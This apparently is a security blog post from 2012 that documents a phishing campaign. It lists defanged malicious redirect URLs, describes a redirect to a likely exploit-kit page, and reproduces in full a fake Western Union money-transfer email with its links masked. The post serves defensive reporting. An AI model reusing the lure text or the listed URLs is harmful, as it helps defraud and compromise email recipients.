http://www [DOT] fantallenatori [DOT] com/pUcAJCR5/index [DOT] html

http://www [DOT] fantallenatori [DOT] com/uAu1GZ1V/index [DOT] html=

http://www [DOT] fantallenatori [DOT] com/6E3eDXLg/index [DOT] html

http://quevenderparaganardinero [DOT] com/ZYbjfFiB/index [DOT] htm

http://quevenderparaganardinero [DOT] com/psdr66QH/index [DOT] html

Weirdly, this single link threw an authentication challenge from www [DOT] pictoo [DOT] de:80 --
http://www [DOT] pictoo [DOT] de/5TpLpTTy/index [DOT] html

These links attempted to redirect to http:// 69.163.40.128 /pxyk80ujzb03h [DOT] php?y=p7tqagmzf8qdjqpi (which also threw a dead 404 error from an nginx v0.7.67 server) --
http://doctorraulseveriche [DOT] com/N9SvVNHj/index [DOT] html

http://inove [DOT] imb [DOT] br/oRVx4RJW/index [DOT] html

http://6-engel [DOT] com/7KwgSTdk/index [DOT] html

http://afistan [DOT] com/TwWrw4T9/index [DOT] html

http://academiaplataforma [DOT] com [DOT] br/EsRMFkkp/index [DOT] html

But during the redirect, it threw a "WAIT PLEASE Loading. . ." message in a format I've previously seen used to send the visitor on to a website that serves automated exploits against the visitor's machine.
WAIT PLEASE Loading. . .

It's possible these 5 specific links will start working at a later time with just a simple DNS update pointing the redirect at another live host.

Good times


Screenshot of an example email:

Yep, this Western Union email is clearly fake

Text of an example email (minus the html formatting):

Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp22737ibe;
Thu, 30 Aug 2012 05:54:32 -0700 (PDT)
Received: by 10.42.18.193 with SMTP id y1mr4641886ica.0.1346331271484;
Thu, 30 Aug 2012 05:54:31 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by domain of commerciale@eurocina.it) client-ip=10.10.10.23;
Received: by 10.64.35.42 with POP3 id e10mf1997265iej.8;
Thu, 30 Aug 2012 05:54:30 -0700 (PDT)
Return-Path:
Delivered-To:
Received: from mx1 ([10.10.10.23])
by mss-us12 (Dovecot) with LMTP id MNheK7NhP1BXIwAAkZ4h7A
for ; Thu, 30 Aug 2012 12:51:09 +0000
Received: from srv534004-1.cloud.colt-engine.it (srv534004-1.cloud.colt-engine.it [81.31.148.114])
by mx1 (Postfix) with ESMTP id 442AB4715AB
for ; Thu, 30 Aug 2012 12:51:09 +0000 (GMT)
Received: from 85-250-70-7.bb.netvision.net.il ([85.250.70.7] helo=eurocina.it)
by srv534004-1.cloud.colt-engine.it with esmtpsa (TLSv1:AES256-SHA:256)
(Exim 4.76)
(envelope-from )
id 1T74CM-0002Od-2o; Thu, 30 Aug 2012 14:50:14 +0200
Message-ID: <337f2ff7.43d9abdf@eurocina.it>
Date: Thu, 30 Aug 2012 14:50:17 +0200
Reply-To: "2012, Western Union"
From: "2012, Western Union"
X-Accept-Language: en-us
MIME-Version: 1.0
To:
Subject: Western Union: Confirmed money transfer
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Dear Melanie Gibb,


Thank you for using the Western Union Money Transfer service

Your money transfer has been authorized, and is now available for pick up by the receiver.




Transfers to certain destinations may be subject to further delay or additional restrictions.


TRANSACTION DETAILS:


Your Money Transfer Control Number [MTCN] is: 7741471847


Please use this number for all inquiries.


Date of Order: 08/13/2012
Time of Order: 3:25 p.m. ET
Total Amount: $200.50
Transaction Type: credit
AUTH CODE: 16985615

Selected Additional Service (s):
No Additional Services selected.

Western Union Gold Card Reward Summary
Western Union Card Number: 43566235
Points Earned: 85
Total Points: 30

Click here for transaction details [LINK TO NON-WESTERN UNION SITE]


YOU EARNED 3 MINUTES OF PHONE TIME! Your time is loaded directly on your card. Calling instructions are on the card back, or dial 888-628-8862 & enter your personal PIN: 233705064231.


You sent the funds, now make it personal!
Record a greeting with your webcam, upload a photo or send a postcard!
Send a free greeting now at http://wugreetings [DOT] com


Check if the receiver has picked up the money transfer. [LINK TO NON-WESTERN UNION SITE]


IN ADDITION TO THE TRANSFER FEE, WESTERN UNION ALSO MAKES MONEY WHEN IT CHANGES YOUR DOLLARS TO PESOS. PLEASE SEE BELOW FOR MORE INFORMATION REGARDING CURRENCY EXCHANGE.

IN ADDITION TO THE TRANSFER SERVICE CHARGES, WESTERN UNION ALSO EARNS MONEY WHEN IT CHANGES YOUR DOLLARS TO PESOS. PLEASE READ BELOW FOR MORE INFORMATION ABOUT CURRENCY EXCHANGE.

THE CURRENCY TO BE PAID OUT AND THE EXCHANGE RATE FOR YOUR TRANSACTION WERE DETERMINED AT THE TIME OF SEND IF LISTED ON YOUR RECEIPT. OTHERWISE, THE EXCHANGE RATE WILL BE SET WHEN THE RECEIVER RECEIVES THE FUNDS. PROTECT YOURSELF FROM CONSUMER FRAUD. BE CAREFUL WHEN A STRANGER ASKS YOU TO SEND MONEY. FOR A COMPLETE COPY OF THE TERMS AND CONDITIONS GOVERNING THIS TRANSACTION AND THE SERVICES YOU HAVE SELECTED PLEASE REVIEW AND PRINT THE TERMS AND CONDITIONS.[LINK TO NON-WESTERN UNION SITE]


REFUNDS. PRINCIPAL REFUNDS and cancellation of the money transfer will be made if payment to the Receiver has not been made when Western Union processes Customers written request. TRANSFER FEE REFUNDS are generally made if funds are not available to the Receiver within Western Unions specified timeframes. Qualifying refunds will be made within 45 days of receipt of Customers valid written request.


LIMITATIONS OF LIABILITY. . IN NO EVENT SHALL WESTERN UNION BE LIABLE FOR DAMAGES FOR DELAY, NONDELIVERY, NONPAYMENT OR UNDERPAYMENT OF ANY SERVICES TRANSACTION, WHETHER CAUSED BY NEGLIGENCE ON THE PART OF ITS EMPLOYEES, SUPPLIERS OR AGENTS OR OTHERWISE, BEYOND THE SUM OF $500 (in addition to refunding the principal amount and the transfer fees), UNLESS THE SENDER HAS OBTAINED A HIGHER LIABILITY LIMIT BY CALLING THE TELEPHONE NUMBER SET FORTH BELOW AND PAYING AN ADDITIONAL CHARGE THEREFOR. IN NO EVENT WILL WESTERN UNION BE LIABLE FOR ANY INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY OR PUNITIVE DAMAGES OR THE LIKE. THESE CONDITIONS CANNOT BE CHANGED OR SUPPLEMENTED ORALLY.


CURRENCY EXCHANGE. Payments will generally be in local currency (except that in certain countries payment may be in U.S. dollars or other alternate currency at participating locations). In addition to the transfer fees applicable to this transaction, a currency exchange rate will be applied. United States currency is converted to foreign currency at an
exchange rate set by Western Union. Any difference between the rate given to Customers and the rate received by Western Union will be kept by Western Union (and its Agents in some cases) in addition to the transfer fees. Please ask a customer service representative for information concerning the currency exchange rate applicable to your transaction. You may also find out
the current foreign exchange rate provided by Western Union to its customers by calling toll-free to 1-800-325-6000.

The transfer fees and the money Western Union (or its Agents) makes when it changes your dollars into foreign currency may vary based upon the payout currency that you select. Some Western Union Agents may offer receivers the choice to receive funds in a currency different from the one you selected. In such instances, Western Union (or its Agents) may make additional money when it changes your funds into the Receiver selected currency.


CURRENCY EXCHANGE. Payments will generally be made in local currency (except that in some countries payment may be made in U.S. dollars or another alternative currency at participating locations). In addition to the transfer service charges established for this transaction, a currency exchange rate will be applied. For the conversion of United States currency to foreign currency, the exchange rate determined by Western Union will be applied. Any difference between the exchange rate offered to customers and the exchange rate obtained by Western Union, in addition to the transfer service charges, will go to Western Union (and its agents in some cases). Please ask the customer service representative who assists you for information about the currency exchange rate that will be applied to your transaction. You may also request information about the current foreign currency exchange rate that Western Union is offering its customers by calling toll-free 1-800-325-4045.

The transfer service charges and the money that Western Union (or its Agencies) earns when changing your dollars to foreign currency may vary according to the payout currency you select. Some Western Union agent locations may offer the Receiver the choice of receiving the money in a currency different from the one you selected. In such cases, Western Union (or its agents) may earn additional money when they change your money into the currency chosen by the Receiver.



WESTERN UNION PRIVACY POLICIES: Western Union may disclose your personal information to third parties as explained in its Privacy Statement ("Statement"). To obtain a copy of the Statement, ask your Western Union Agent or call 1-800-562-2598. Information disclosed may include financial background; identification, such as name and address; transaction information; and other information relating to financial matters. Recipients may include financial institutions; retailers; companies that process
transactions or provide other services for us; government agencies; and direct marketers. You may opt out of (direct us not to make) certain disclosures. If you do not opt out, we will assume that you agree that your
information may be used as the Statement describes. To opt out, call 1-800-562-2598.


We value your opinion! Go to [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com] to tell us about our service. Survey code : 2879429247.


If you have any questions, visit us at [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com]


Thank you for using Western Union!


DO NOT REPLY TO THIS EMAIL. IF YOU HAVE QUESTIONS PLEASE CONTACT US [LINK TO NON-WESTERN UNION SITE]

Tuesday, August 28, 2012

@securityguy23:

Rebuilding my lab box after some hardware decided to unexpectedly go all funky chicken over the weekend without the required change control approvals. . .